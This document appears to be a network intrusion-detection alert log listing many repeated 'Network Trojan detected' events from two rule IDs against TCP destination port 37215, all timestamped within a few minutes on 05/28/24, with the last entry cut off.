            SID:2835222
            Source Port:57728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993839
            SID:2835222
            Source Port:35120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778353
            SID:2829579
            Source Port:34384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767013
            SID:2835222
            Source Port:33476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803598
            SID:2835222
            Source Port:48216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543168
            SID:2829579
            Source Port:38678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880330
            SID:2829579
            Source Port:52770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952165
            SID:2835222
            Source Port:34148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450892
            SID:2835222
            Source Port:44558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766970
            SID:2835222
            Source Port:44684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057063
            SID:2829579
            Source Port:41022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075014
            SID:2829579
            Source Port:34760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857206
            SID:2835222
            Source Port:35930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715780
            SID:2829579
            Source Port:39408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561600
            SID:2835222
            Source Port:41354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290630
            SID:2835222
            Source Port:36566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756534
            SID:2835222
            Source Port:51834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770312
            SID:2829579
            Source Port:37418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495835
            SID:2829579
            Source Port:58898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012324
            SID:2835222
            Source Port:43308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066901
            SID:2835222
            Source Port:42522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858560
            SID:2835222
            Source Port:52150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900772
            SID:2835222
            Source Port:42880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084630
            SID:2829579
            Source Port:53946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052538
            SID:2829579
            Source Port:55786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706135
            SID:2829579
            Source Port:35756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687531
            SID:2829579
            Source Port:33466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.769869
            SID:2835222
            Source Port:35128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.550798
            SID:2829579
            Source Port:60402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887555
            SID:2835222
            Source Port:48068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712976
            SID:2835222
            Source Port:38462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922380
            SID:2835222
            Source Port:53030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994059
            SID:2835222
            Source Port:33292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643819
            SID:2835222
            Source Port:46600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685683
            SID:2829579
            Source Port:59534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855171
            SID:2829579
            Source Port:51354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.383579
            SID:2835222
            Source Port:59686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754154
            SID:2835222
            Source Port:60960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.730173
            SID:2835222
            Source Port:45908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912014
            SID:2829579
            Source Port:59718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.295687
            SID:2835222
            Source Port:38660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073319
            SID:2835222
            Source Port:51200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778472
            SID:2829579
            Source Port:51034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729048
            SID:2829579
            Source Port:52280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.011134
            SID:2835222
            Source Port:51806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.673229
            SID:2835222
            Source Port:48906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.911064
            SID:2829579
            Source Port:51050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910591
            SID:2835222
            Source Port:60724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920156
            SID:2835222
            Source Port:35856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723984
            SID:2829579
            Source Port:51872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182207
            SID:2829579
            Source Port:33440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586789
            SID:2829579
            Source Port:57796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811972
            SID:2829579
            Source Port:58808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821347
            SID:2829579
            Source Port:35164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182264
            SID:2835222
            Source Port:48866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855752
            SID:2829579
            Source Port:50720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055184
            SID:2835222
            Source Port:33932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.681712
            SID:2829579
            Source Port:48974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079497
            SID:2835222
            Source Port:58252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068411
            SID:2829579
            Source Port:44356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972457
            SID:2829579
            Source Port:48708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831608
            SID:2829579
            Source Port:50110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423078
            SID:2829579
            Source Port:32812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.649082
            SID:2835222
            Source Port:42158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.277497
            SID:2835222
            Source Port:39250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810157
            SID:2835222
            Source Port:39786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734804
            SID:2829579
            Source Port:42496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669761
            SID:2835222
            Source Port:41208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777899
            SID:2829579
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848949
            SID:2829579
            Source Port:33520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760054
            SID:2835222
            Source Port:56516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906374
            SID:2835222
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309190
            SID:2829579
            Source Port:46450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806379
            SID:2829579
            Source Port:57122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922221
            SID:2835222
            Source Port:49054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944227
            SID:2835222
            Source Port:47456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447099
            SID:2829579
            Source Port:42998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550494
            SID:2835222
            Source Port:55966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341952
            SID:2835222
            Source Port:57806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809584
            SID:2829579
            Source Port:50624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864140
            SID:2829579
            Source Port:51118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377101
            SID:2829579
            Source Port:38928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809246
            SID:2829579
            Source Port:57014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312800
            SID:2829579
            Source Port:38052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276403
            SID:2835222
            Source Port:33078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506264
            SID:2829579
            Source Port:60502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756941
            SID:2829579
            Source Port:43754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027158
            SID:2829579
            Source Port:53700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818876
            SID:2835222
            Source Port:34570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946657
            SID:2835222
            Source Port:44452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.988983
            SID:2829579
            Source Port:45678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054882
            SID:2829579
            Source Port:36418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493052
            SID:2829579
            Source Port:45112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861779
            SID:2835222
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879850
            SID:2835222
            Source Port:58456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911363
            SID:2835222
            Source Port:50272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.335921
            SID:2829579
            Source Port:47740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.675303
            SID:2835222
            Source Port:54506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735926
            SID:2835222
            Source Port:39554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956287
            SID:2829579
            Source Port:55936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319100
            SID:2829579
            Source Port:46084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893241
            SID:2835222
            Source Port:48534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305530
            SID:2829579
            Source Port:49876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506874
            SID:2835222
            Source Port:58904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440794
            SID:2829579
            Source Port:55794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569232
            SID:2835222
            Source Port:42574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789187
            SID:2829579
            Source Port:54118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581956
            SID:2835222
            Source Port:55784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714794
            SID:2829579
            Source Port:60102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065883
            SID:2835222
            Source Port:55704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669895
            SID:2835222
            Source Port:59770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832631
            SID:2835222
            Source Port:49632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841962
            SID:2835222
            Source Port:58464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926612
            SID:2835222
            Source Port:45558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812557
            SID:2835222
            Source Port:55958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435248
            SID:2835222
            Source Port:38664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969737
            SID:2835222
            Source Port:38832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298666
            SID:2835222
            Source Port:57098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892443
            SID:2835222
            Source Port:56918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753747
            SID:2829579
            Source Port:56516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834003
            SID:2829579
            Source Port:52908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815696
            SID:2835222
            Source Port:36420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746890
            SID:2829579
            Source Port:40334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868338
            SID:2829579
            Source Port:33566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.975241
            SID:2829579
            Source Port:45720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.930881
            SID:2835222
            Source Port:49170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052457
            SID:2829579
            Source Port:36942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782441
            SID:2829579
            Source Port:54372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841827
            SID:2835222
            Source Port:48502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060100
            SID:2835222
            Source Port:37514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279826
            SID:2835222
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922762
            SID:2835222
            Source Port:49034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444117
            SID:2829579
            Source Port:43410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336049
            SID:2829579
            Source Port:57074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.663829
            SID:2829579
            Source Port:53492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280261
            SID:2829579
            Source Port:38916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.604944
            SID:2835222
            Source Port:38070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047389
            SID:2829579
            Source Port:38522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516622
            SID:2835222
            Source Port:56858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.634989
            SID:2835222
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330519
            SID:2829579
            Source Port:43066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575976
            SID:2835222
            Source Port:38794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941710
            SID:2829579
            Source Port:55570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508100
            SID:2829579
            Source Port:41088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946847
            SID:2829579
            Source Port:39754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058353
            SID:2829579
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822134
            SID:2829579
            Source Port:55808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068885
            SID:2829579
            Source Port:50640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322814
            SID:2829579
            Source Port:53942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.108214
            SID:2829579
            Source Port:60410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855578
            SID:2835222
            Source Port:43946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334451
            SID:2835222
            Source Port:37218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669810
            SID:2829579
            Source Port:58560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587405
            SID:2829579
            Source Port:41956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794068
            SID:2835222
            Source Port:56034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541930
            SID:2829579
            Source Port:36636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358282
            SID:2829579
            Source Port:34694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.924219
            SID:2835222
            Source Port:34534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766830
            SID:2829579
            Source Port:34856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843747
            SID:2835222
            Source Port:56460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444751
            SID:2835222
            Source Port:57104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.682194
            SID:2835222
            Source Port:45278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508189
            SID:2835222
            Source Port:33232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914935
            SID:2829579
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.469113
            SID:2835222
            Source Port:40944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.071592
            SID:2835222
            Source Port:38452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860580
            SID:2835222
            Source Port:43356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775582
            SID:2835222
            Source Port:54002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878756
            SID:2835222
            Source Port:37174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451901
            SID:2829579
            Source Port:57452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809496
            SID:2835222
            Source Port:36524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810111
            SID:2835222
            Source Port:53040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556611
            SID:2835222
            Source Port:54660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857135
            SID:2835222
            Source Port:45224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.012634
            SID:2835222
            Source Port:35508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.618079
            SID:2829579
            Source Port:38724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883669
            SID:2829579
            Source Port:51922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825392
            SID:2829579
            Source Port:39420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756513
            SID:2829579
            Source Port:56832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905708
            SID:2835222
            Source Port:52932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644082
            SID:2829579
            Source Port:45742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310436
            SID:2835222
            Source Port:56576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759920
            SID:2835222
            Source Port:60754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375198
            SID:2829579
            Source Port:45894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.454095
            SID:2835222
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.950312
            SID:2835222
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954200
            SID:2835222
            Source Port:40944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929887
            SID:2835222
            Source Port:38664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508098
            SID:2829579
            Source Port:34304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639438
            SID:2829579
            Source Port:41834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710561
            SID:2835222
            Source Port:50876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863546
            SID:2835222
            Source Port:60244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996283
            SID:2829579
            Source Port:51144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910025
            SID:2835222
            Source Port:40482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748257
            SID:2829579
            Source Port:52542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930971
            SID:2829579
            Source Port:47062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.903997
            SID:2835222
            Source Port:43650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934244
            SID:2829579
            Source Port:40038
            Destination Port:37215
